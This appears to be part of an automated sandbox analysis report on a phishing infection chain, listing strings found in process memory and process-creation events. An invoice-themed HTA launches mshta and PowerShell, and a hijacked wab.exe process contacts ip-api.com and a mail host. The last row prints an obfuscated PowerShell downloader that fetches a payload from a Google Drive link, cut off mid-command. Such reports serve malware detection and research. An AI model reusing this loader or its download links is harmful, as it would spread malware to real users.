| Source | Detail |
|---|---|
| powershell.exe, 00000005.00000002.2389835741.0000000007A0B000.00000004.00000020.00020000.00000000.sdmp | Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbY |
| powershell.exe, 00000005.00000002.2389835741.0000000007A0B000.00000004.00000020.00020000.00000000.sdmp | Binary string: ws\System.Core.pdb |
| powershell.exe, 00000005.00000002.2389835741.00000000079F0000.00000004.00000020.00020000.00000000.sdmp | Binary string: System.Core.pdb |
| powershell.exe, 00000005.00000002.2389835741.00000000079F0000.00000004.00000020.00020000.00000000.sdmp | Binary string: System.Core.pdbk |
| powershell.exe, 00000005.00000002.2389835741.0000000007A0B000.00000004.00000020.00020000.00000000.sdmp | Binary string: CallSite.Targetore.pdb |
| newfile.exe, 0000000A.00000000.2479023272.0000000000C31000.00000020.00000001.01000000.0000000F.sdmp, newfile.exe, 0000000C.00000000.2575308880.0000000000C31000.00000020.00000001.01000000.0000000F.sdmp, newfile.exe.8.dr | Binary string: wab.pdbGCTL |
| powershell.exe, 00000005.00000002.2396600262.0000000008A3B000.00000004.00000020.00020000.00000000.sdmp | Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb |
| newfile.exe, newfile.exe, 0000000A.00000000.2479023272.0000000000C31000.00000020.00000001.01000000.0000000F.sdmp, newfile.exe, 0000000C.00000000.2575308880.0000000000C31000.00000020.00000001.01000000.0000000F.sdmp, newfile.exe.8.dr | Binary string: wab.pdb |
| svchost.exe, 00000003.00000002.3246360676.0000021BDE200000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver) |
| qmgr.db.3.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU |
| qmgr.db.3.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n |
| qmgr.db.3.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/ |
| qmgr.db.3.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567 |
| qmgr.db.3.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg |
| qmgr.db.3.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe |
| edb.log.3.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20 |
| wab.exe, 00000008.00000002.3260035578.00000000207F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com |
| wab.exe, 00000008.00000002.3260035578.00000000207F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/line/?fields=hosting |
| wab.exe, 00000008.00000002.3260035578.0000000020854000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.cash4cars.nz |
| powershell.exe, 00000001.00000002.2442017954.000000000554A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2385835315.0000000005EFA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
| powershell.exe, 00000005.00000002.2382419580.0000000004FED000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
| wab.exe, 00000008.00000002.3261235261.0000000022941000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3260035578.0000000020854000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2453618255.0000000022965000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://r3.i.lencr.org/0R |
| wab.exe, 00000008.00000002.3261235261.0000000022941000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3260035578.0000000020854000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2453618255.0000000022965000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://r3.o.lencr.org0 |
| powershell.exe, 00000001.00000002.2427094918.00000000044E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2382419580.0000000004E91000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3260035578.00000000207F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
| powershell.exe, 00000005.00000002.2382419580.0000000004FED000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
| powershell.exe, 00000001.00000002.2448479212.0000000006EAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co |
| wab.exe, 00000008.00000002.3261235261.0000000022941000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3260035578.0000000020854000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3245859914.0000000004C57000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2453618255.0000000022965000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0 |
| wab.exe, 00000008.00000002.3261235261.0000000022941000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3260035578.0000000020854000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3245859914.0000000004C57000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2453618255.0000000022965000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0 |
| powershell.exe, 00000001.00000002.2427094918.00000000044E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2382419580.0000000004E91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB |
| powershell.exe, 00000001.00000002.2427094918.0000000004807000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2368769427.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2368875236.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apis.google.com |
| powershell.exe, 00000005.00000002.2385835315.0000000005EFA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
| powershell.exe, 00000005.00000002.2385835315.0000000005EFA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
| powershell.exe, 00000005.00000002.2385835315.0000000005EFA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
| powershell.exe, 00000001.00000002.2427094918.000000000463D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com |
| wab.exe, 00000008.00000002.3245859914.0000000004C57000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/ |
| wab.exe, 00000008.00000002.3245859914.0000000004C57000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com//ApU3 |
| powershell.exe, 00000001.00000002.2427094918.000000000463D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2382419580.0000000004FED000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1iLf5bIpysmyGdUsty6cS9uMyDkTZrnvHXR |
| wab.exe, 00000008.00000002.3246491892.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3245859914.0000000004C91000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1v8In2nCfZQ27ZL002G4s16BbdfpZ-bAh |
| wab.exe, 00000008.00000002.3245859914.0000000004C91000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1v8In2nCfZQ27ZL002G4s16BbdfpZ-bAhou |
| powershell.exe, 00000001.00000002.2427094918.000000000480C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com |
| wab.exe, 00000008.00000003.2371113623.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2381190586.0000000004CBD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2381233874.0000000004CC1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3245859914.0000000004CBD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/ |
| powershell.exe, 00000001.00000002.2427094918.000000000480C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1iLf5bIpysmyGdUsty6cS9uMyDkTZrnvH&export=download |
| wab.exe, 00000008.00000003.2368769427.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3245859914.0000000004CAD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2371113623.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2368875236.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1v8In2nCfZQ27ZL002G4s16BbdfpZ-bAh&export=download |
| wab.exe, 00000008.00000003.2371113623.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2381190586.0000000004CBD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2381233874.0000000004CC1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/y |
| edb.log.3.dr | String found in binary or memory: https://g.live.com/odclientsettings/Prod/C: |
| svchost.exe, 00000003.00000003.2021884411.0000021BDE010000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C: |
| powershell.exe, 00000005.00000002.2382419580.0000000004FED000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
| powershell.exe, 00000001.00000002.2427094918.0000000004CC9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro |
| powershell.exe, 00000001.00000002.2442017954.000000000554A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2385835315.0000000005EFA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
| qmgr.db.3.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C: |
| powershell.exe, 00000001.00000002.2427094918.0000000004807000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2368769427.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2368875236.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ssl.gstatic.com |
| powershell.exe, 00000001.00000002.2427094918.0000000004807000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2368769427.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2368875236.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com;report-uri |
| powershell.exe, 00000001.00000002.2427094918.0000000004807000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2368769427.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2368875236.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com |
| powershell.exe, 00000001.00000002.2427094918.0000000004807000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2368769427.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2368875236.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com |
| powershell.exe, 00000001.00000002.2427094918.0000000004807000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2368769427.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2368875236.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com |
| unknown | Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\Gesti#U00f3n Pago a Proveedores - Liquidaci#U00f3n anticipo.hta" |
| C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Nasolacrimal = 1;$Crummies182='Substrin';$Crummies182+='g';Function Nejsigerens($Paynize){$Respirator=$Paynize.Length-$Nasolacrimal;For($bolsjes=5; $bolsjes -lt $Respirator; $bolsjes+=(6)){$Velmagtstid+=$Paynize.$Crummies182.Invoke($bolsjes, $Nasolacrimal);}$Velmagtstid;}function Vinddrejning($Brinken){. ($Findelings) ($Brinken);}$Sedimentet=Nejsigerens ',hoppMSil.no SkakzSlleriAkkorlHeterlSyncha.ylte/Gardi5 Ympe.Smlst0 Nei Fabel(RomanWSeed.iBed nnPost.dTilhyoTj.new tirrsMod.g PartNaadseTPaali Haf,a1Indru0P,gme.Prjud0 o,ni;Glamo NonpaWBromii SlaunAstra6P.ene4Desmo;Chous gitax T,ne6Angst4Engin;Calyp SubdorLavniv Farv:Nyrel1Rival2Tempo1Faste.Senge0Reo.t)Skamf TricG P oteunl,ccGr ymkGlo eo aute/ .ata2Ca er0thuj 1S.erl0 Beds0Betin1Tete,0Rearr1Typis OstraFsaginiR,ndsrChrone RetsfB,natoI scux B.nd/Bogti1Alter2 A,lu1Svell.,avpr0Brode ';$Accouplement=Nejsigerens 'CrotoUtravasNebuleRetslrPe ta-VinylA,oblegOpstieNonbinKokketOvers ';$Chorioretinal=Nejsigerens ' Top,hGuaratSoliftXosavpBen is flyv:Podni/Jer s/cl padwolfgr K.miiAfglavgreeneBev,l. ScabgPrea oMicroo irayg PyrolHa,moe,ista.HighecHund.oscro,mSpir./MachiuMydricEvenn?Rain.eParcax ,edipgrumboPro,rrNgleftCh,ly= CottdHuntso Eftew TilbnFeutelHom,woPositaLoquadCarac&Plag iEpicudFoste=Possi1 UndeiXenylLSjklefBeman5MyelobRegioI Y gipDefalyKonges Rackm Ef eyBlrehGGemmadKompaUNo,nysUnseet SiakyUan,d6defauc,ueriSErgat9NonfouMe ioMTeatey.ogstD,atklkAlu,aTDecelZ OzelrMirabnsnuffvcongeH opsk ';$Roselil=Nejsigerens 'Forle>Geoge ';$Findelings=Nejsigerens ' Polli SvineFor,lxKoron ';$Forslvende='Tarnishable';Vinddrejning (Nejsigerens 'Vrd.pSPhilaeByr.ttRe to-DigesCStilloTgtgenErholtDoddieWindln,andotSu.er tirz-Pol,lP un ea BegrtredirhYderz SubmaT.oral: omer\at.enT MyceeTryllrNyanjzUs nse Fungt EpidtObligoTrykf.R.flhtSt.afxF.agttConce itr-LuskeVRakkeaWrybilS.eenuAfgife Jell Gunya$ Go,aFMegavoAutomrAtropsSulfolClotsvW.ttieCraninHyperdPolyreAf gt;Rorpi ');Vinddrejning (Nejsigerens 'Udb ki Gennf Medi hefti(TeksttRetypeKni.ssWolfetS lfi-MicropId,liaForbrtpsychhMilea C.onTo,tol:Valut\ErhveTCityee MaizrU.uelzLovfoe Ph etHandetbaksnoSavor.VisiotTessax supetLuf,v)kalci{Hermge OmkoxF rniiPhrentDisk }Discu;Uhums ');$gedde = Nejsigerens 'brneheA,rstcBrunehPaaseoSindb P.rfo%Ge neaArmhup M,slpHivoldprospapontitDiletaFr,ng%Palar\ShogaLSkrupaL,ceicE,imet V.dnoOph |